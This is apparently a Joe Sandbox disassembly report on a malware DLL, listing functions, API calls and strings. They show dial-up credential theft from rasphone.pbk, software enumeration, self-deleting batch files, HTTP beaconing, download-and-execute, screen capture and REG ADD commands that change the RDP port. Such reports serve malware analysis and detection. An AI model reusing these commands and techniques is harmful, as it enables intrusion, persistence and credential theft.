                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 100078EB
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 100078F1
                        • lstrlen.KERNEL32(00000000,?,00000000,?,?), ref: 100078FA
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000792D
                          • Part of subcall function 10007560: wsprintfA.USER32 ref: 100075CC
                          • Part of subcall function 10007560: LsaFreeMemory.ADVAPI32(?), ref: 100075FA
                          • Part of subcall function 10007560: LsaFreeMemory.ADVAPI32(?), ref: 10007624
                        Strings
                        • DialParamsUID, xrefs: 100077CF
                        • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000769A
                        • %s\%s, xrefs: 100076CA
                        • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 100076BD
                        • Documents and Settings\, xrefs: 1000765F
                        • PhoneNumber, xrefs: 10007878
                        • Device, xrefs: 10007890
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@PrivateProfile$Stringlstrcpy$FreeMemorylstrcatwsprintf$??2@DirectoryFolderNamesPathSectionSpecialVersionWindowslstrcmplstrlenstrchr
                        • String ID: %s\%s$Device$DialParamsUID$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$PhoneNumber$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                        • API String ID: 4167786638-3033193607
                        • Opcode ID: 62fdc036efb3f08eb917b7ad97d9db31e77baedd4283ce09ea0ee9c22c8b1d22
                        • Instruction ID: 65fd49af7cc330dfde9ed866b878fdab77b69f329216efd5a696316092efa724
                        • Opcode Fuzzy Hash: 62fdc036efb3f08eb917b7ad97d9db31e77baedd4283ce09ea0ee9c22c8b1d22
                        • Instruction Fuzzy Hash: 14815E71504385ABE724CB14CC84FABB3E9FBC4744F004A1DF68997255DB78AA05CB66
                        Function 100122E0 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 339stringregistrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32 ref: 10012330
                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000040), ref: 10012360
                        • RegEnumKeyExA.ADVAPI32(00000040,00000000,?,?,00000000,00000000,00000000,00000000), ref: 10012386
                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 100124B0
                        • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,00000007,00000007,?), ref: 100124DF
                        • RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000007,?,00000001), ref: 100124FF
                        • strstr.MSVCRT ref: 10012584
                        • strstr.MSVCRT ref: 1001259B
                        • lstrlen.KERNEL32(?), ref: 100125B0
                        • lstrlen.KERNEL32(?), ref: 100125B9
                        • LocalSize.KERNEL32(00000000), ref: 100125C7
                        • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 100125D5
                        • lstrlen.KERNEL32(?), ref: 100125E6
                        • lstrlen.KERNEL32(?), ref: 10012604
                        • lstrlen.KERNEL32(?), ref: 10012616
                        • lstrlen.KERNEL32(?), ref: 1001263F
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 100126AF
                        • RegCloseKey.ADVAPI32(00000040), ref: 100126C6
                        • LocalReAlloc.KERNEL32(00000000,00010000,00000042), ref: 100126D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Local$Alloc$EnumOpenQueryValuestrstr$CloseSize
                        • String ID: DisplayName$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$Windows
                        • API String ID: 2254360075-2665300987
                        • Opcode ID: 2c83e0f3829b57c1637a005e2d03bd4edf689333d9d089b7fdcf0465c8605360
                        • Instruction ID: 9a663e677994bdbda6aa0451083b79a34b57187614e022742c0a7b2eb9cd9f4c
                        • Opcode Fuzzy Hash: 2c83e0f3829b57c1637a005e2d03bd4edf689333d9d089b7fdcf0465c8605360
                        • Instruction Fuzzy Hash: 87B1D6B16043856BD715CF24CC90BABB7DAEFC8350F444A2DFA8997280EA75EE48C751
                        Function 1000CDF8 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145stringfileprocessCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000CEB5
                        • lstrcpy.KERNEL32(00000000,@echo off), ref: 1000CEC8
                        • lstrcat.KERNEL32(00000000,@del 3596799a1543bc9f.aqq), ref: 1000CEE6
                        • lstrcat.KERNEL32(00000000,@del "), ref: 1000CEF8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 1000CF07
                        • lstrcat.KERNEL32(00000000,"), ref: 1000CF16
                        • lstrcat.KERNEL32(00000000,@del ), ref: 1000CF25
                        • lstrcat.KERNEL32(00000000,?), ref: 1000CF34
                        • lstrcat.KERNEL32(00000000,@exit), ref: 1000CF43
                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 1000CF59
                        • WriteFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 1000CF76
                        • CloseHandle.KERNEL32(00000000), ref: 1000CF7D
                        • WinExec.KERNEL32(?,00000000), ref: 1000CF8A
                        • ExitProcess.KERNEL32 ref: 1000CF92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$CloseCreateExecExitHandleModuleNameProcessWritelstrcpy
                        • String ID: @exit$"$@del $@del "$@del 3596799a1543bc9f.aqq$@echo off$afc9fe2f418b00a0.bat
                        • API String ID: 433470039-873414491
                        • Opcode ID: d6c722796a129642dce7219ad350ec3b9c467727d6019d44186d2aca1d57c634
                        • Instruction ID: 9189458aa8c4cf93b31bced51721bf63fee7bb030453e1165ca5f5ef6cc5b1c3
                        • Opcode Fuzzy Hash: d6c722796a129642dce7219ad350ec3b9c467727d6019d44186d2aca1d57c634
                        • Instruction Fuzzy Hash: 4D41C072515794ABEB12CB60CC85FC67BA9EF8E710F044C98E6845F044DB74B629CB93
                        Function 10004B10 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 186stringsleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strcspn$strstr$strncpy$ExitSleepThreadUseratoi
                        • String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                        • API String ID: 3047203434-1551478559
                        • Opcode ID: a1220443a54d2b53f0f4d7c090762801d30e4d452ea2ed4c57b0f136f52fed29
                        • Instruction ID: 5b22ac7470861d30f40f049b028cb2d5bfa3e7d4fdb3b283d83c52af37cf9561
                        • Opcode Fuzzy Hash: a1220443a54d2b53f0f4d7c090762801d30e4d452ea2ed4c57b0f136f52fed29
                        • Instruction Fuzzy Hash: 8D510B3211026417E714D6B48C44DDF7BD6EFC6260F02861DFA9293190DFBDEA498799
                        Function 100092C0 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 120stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 1000DA90: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00000001), ref: 10009341
                        • lstrcat.KERNEL32(?,rar.exe), ref: 1000937D
                        • PathIsDirectoryA.SHLWAPI(?), ref: 10009380
                        • lstrcpy.KERNEL32(?,?), ref: 10009399
                        • lstrcat.KERNEL32(?,.rar), ref: 100093A8
                        • lstrcpy.KERNEL32(?,?), ref: 100093B0
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 100093BC
                        • wsprintfA.USER32 ref: 100093D8
                        • lstrcpy.KERNEL32(?,?), ref: 100093FC
                        • PathRemoveExtensionA.SHLWAPI(?,?,?,?,?,?,?,00000001), ref: 10009407
                        • lstrcat.KERNEL32(?,.rar), ref: 10009417
                        • wsprintfA.USER32 ref: 1000942C
                        • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 10009450
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$Pathwsprintf$DirectoryExecuteExtensionOpenRemoveShelllstrlen
                        • String ID: .rar$WinRAR\shell\open\command$a %s %s$a -r %s %s$open$rar.exe
                        • API String ID: 1594156495-1032977547
                        • Opcode ID: efdd53268cf342ae471ac0c08158dc04c7c086f7e75fb8a4579fe12ad8bd1881
                        • Instruction ID: 3e314928fd486b522302930d6b560aaf31cc8829cd0054620456e89bedff2735
                        • Opcode Fuzzy Hash: efdd53268cf342ae471ac0c08158dc04c7c086f7e75fb8a4579fe12ad8bd1881
                        • Instruction Fuzzy Hash: A84160B2104395AEE720DBA0CC94FEB77ADEBC5304F008D1DF785A7140DA74A609CB66
                        Function 1000B5B0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 212fileCOMMON
                        Download Yara Rule
                        APIs
                        • malloc.MSVCRT ref: 1000B5DD
                        • atoi.MSVCRT(?), ref: 1000B5FC
                        • CreateFileA.KERNEL32(c:\3389.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000B630
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B6C0
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B6DC
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 1000B700
                        Strings
                        • /f , xrefs: 1000B663, 1000B73A
                        • C:\3389.bat, xrefs: 1000B81A
                        • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B707
                        • del %0, xrefs: 1000B7C0
                        • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B63B
                        • c:\3389.bat, xrefs: 1000B62B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Write$Createatoimalloc
                        • String ID: /f $C:\3389.bat$REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d $REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d $c:\3389.bat$del %0
                        • API String ID: 664794413-4273509073
                        • Opcode ID: 4a562beb377eb0d25d3c94206fc7b098a05763544a8525e4422677f9804f71b6
                        • Instruction ID: 2dd11e1bc02b0585d4e01d345c94449c095036edea532750c3430a92ba72a645
                        • Opcode Fuzzy Hash: 4a562beb377eb0d25d3c94206fc7b098a05763544a8525e4422677f9804f71b6
                        • Instruction Fuzzy Hash: AB61B1721147846AE328CB74CC45BFB77E9EBC8310F104A2DF796932D1DEB5AA088B55
                        Function 10004960 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 148libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(wininet.dll), ref: 10004973
                        • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004991
                        • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 1000499B
                        • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 100049A7
                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 100049B3
                        • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 100049BF
                        • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 100049CB
                        • printf.MSVCRT ref: 10004ABB
                        • FreeLibrary.KERNEL32(00000000), ref: 10004AEA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Library$FreeLoadprintf
                        • String ID: HTTP/1.1$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$wininet.dll
                        • API String ID: 2425834421-3882969375
                        • Opcode ID: 5604c677c17d616dbd6237320c0c9e17bb52209961f7397e4e27ee8460d61bf8
                        • Instruction ID: c76f49d10d34aaa2aae48d406b6706546d346a6edc979813e33e8e3e0fc9c0ae
                        • Opcode Fuzzy Hash: 5604c677c17d616dbd6237320c0c9e17bb52209961f7397e4e27ee8460d61bf8
                        • Instruction Fuzzy Hash: 8B410571644344ABE220DF658C44F6FBBE8EFC2750F41491DB68567180DFB8ED048BAA
                        Function 100113F0 Relevance: 30.1, APIs: 20, Instructions: 85pipesleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        • TerminateThread.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011407
                        • Sleep.KERNEL32(00000001,?,?,?,10009F25,?), ref: 10011411
                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011419
                        • TerminateThread.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011425
                        • Sleep.KERNEL32(00000001,?,?,?,10009F25,?), ref: 10011429
                        • WaitForSingleObject.KERNEL32(?,000007D0,?,?,?,10009F25,?), ref: 10011434
                        • TerminateThread.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011440
                        • Sleep.KERNEL32(00000001,?,?,?,10009F25,?), ref: 10011444
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 10011454
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 1001145E
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 10011468
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 10011472
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 1001147E
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 10011484
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 1001148A
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 10011490
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 10011496
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 1001149C
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 100114A2
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 100114A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$DisconnectNamedPipeTerminate$SleepThread$ObjectProcessSingleWait
                        • String ID:
                        • API String ID: 3528565692-0
                        • Opcode ID: 5207acf1ee83dc58ee6dcb939570a2e4c8c5c7fe19468d28379d1938b680d4f6
                        • Instruction ID: 865924512262c39c9a3102b07c9aebe7ff44f914d59cef4649d6c81058281ce9
                        • Opcode Fuzzy Hash: 5207acf1ee83dc58ee6dcb939570a2e4c8c5c7fe19468d28379d1938b680d4f6
                        • Instruction Fuzzy Hash: 7721DC71600704ABE624EBBACC84F57F3EDAF98B50F114A0DE246D7690CAB4F8419A60
                        Function 100082A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 158registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • strrchr.MSVCRT ref: 100082C9
                        • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 100082FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Openstrrchr
                        • String ID: "%1$%s\shell\open\command$D
                        • API String ID: 1564636448-1634606264
                        • Opcode ID: d52b26d16d16e37de8f49ba75a6bca74216bbfb679f3325d1faf73aa7bd7866a
                        • Instruction ID: 0c999137368e92a700a38a841f1f30b9781bb876b16acea980fc4db480d06be6
                        • Opcode Fuzzy Hash: d52b26d16d16e37de8f49ba75a6bca74216bbfb679f3325d1faf73aa7bd7866a
                        • Instruction Fuzzy Hash: FE418372504345ABE714CB60DC80FABB7EDFBC4345F004C2DFA9497250EAB5EA498B62
                        Function 1000FD20 Relevance: 27.2, APIs: 18, Instructions: 211COMMON
                        Download Yara Rule
                        APIs
                        • LoadCursorA.USER32(00000000,00000000), ref: 1000FDE3
                          • Part of subcall function 100106B0: ReleaseDC.USER32(?,?), ref: 100106CA
                          • Part of subcall function 100106B0: GetDesktopWindow.USER32 ref: 100106D0
                          • Part of subcall function 100106B0: GetDC.USER32(00000000), ref: 100106DD
                        • GetDesktopWindow.USER32 ref: 1000FE32
                        • GetDC.USER32(00000000), ref: 1000FE3F
                        • GetTickCount.KERNEL32 ref: 1000FE53
                        • GetSystemMetrics.USER32(00000000), ref: 1000FE7D
                        • GetSystemMetrics.USER32(00000001), ref: 1000FE84
                        • CreateCompatibleDC.GDI32(?), ref: 1000FEA2
                        • CreateCompatibleDC.GDI32(?), ref: 1000FEAB
                        • CreateCompatibleDC.GDI32(00000000), ref: 1000FEB4
                        • CreateCompatibleDC.GDI32(00000000), ref: 1000FEBA
                        • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 1000FF19
                        • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 1000FF2A
                        • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 1000FF3E
                        • SelectObject.GDI32(?,?), ref: 1000FF54
                        • SelectObject.GDI32(?,?), ref: 1000FF5E
                        • SelectObject.GDI32(?,?), ref: 1000FF6E
                        • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 1000FF7E
                        • ??2@YAPAXI@Z.MSVCRT(00000002), ref: 1000FF8D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$??2@CountCursorLoadRectReleaseTick
                        • String ID:
                        • API String ID: 339399666-0
                        • Opcode ID: a628a9eefc200cb31a8e85018976252ce4784f425b9ed0d6ffdef3f5299ffd15
                        • Instruction ID: 1c21295455e3ec45158c911841c44fc3419dd068098a4d7aa9d695b155e4a8fd
                        • Opcode Fuzzy Hash: a628a9eefc200cb31a8e85018976252ce4784f425b9ed0d6ffdef3f5299ffd15
                        • Instruction Fuzzy Hash: 4581D4B0504B459FE320DF69C884A2BFBE9FB89704F004A1DE59A87750DBB9F8458F91
                        Function 10006C60 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 169filesleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        • sprintf.MSVCRT ref: 10006D1F
                        • sprintf.MSVCRT ref: 10006D67
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10006D7F
                        • Sleep.KERNEL32(00000064,00000000,?,?,00000000,00000000), ref: 10006D86
                        • RtlExitUserThread.NTDLL(00000000), ref: 10006D98
                        • Sleep.KERNEL32(000493E0), ref: 10006DC8
                        • CreateFileA.KERNEL32(C:\Del.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 10006E02
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10006E22
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10006E29
                        • WinExec.KERNEL32(C:\Del.bat,00000000), ref: 10006E36
                        • RtlExitUserThread.NTDLL(00000000), ref: 10006E4F
                          • Part of subcall function 100069C0: GetInputState.USER32 ref: 100069C3
                          • Part of subcall function 100069C0: GetCurrentThreadId.KERNEL32 ref: 100069CF
                          • Part of subcall function 100069C0: PostThreadMessageA.USER32(00000000), ref: 100069D6
                          • Part of subcall function 100069C0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100069E7
                          • Part of subcall function 100042E0: GetTickCount.KERNEL32 ref: 100042E1
                          • Part of subcall function 100042E0: rand.MSVCRT ref: 100042E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$File$ExitMessageSleepUsersprintf$CloseCountCreateCurrentDownloadExecHandleInputPostStateTickWriterand
                        • String ID: %s?abc=%d%d%d%d$C:\Del.bat$C:\WINDOWS\TEMP\%d%d%d%d.ccc$Del c:\windows\temp\**.cccDel %0
                        • API String ID: 1802622305-1970547419
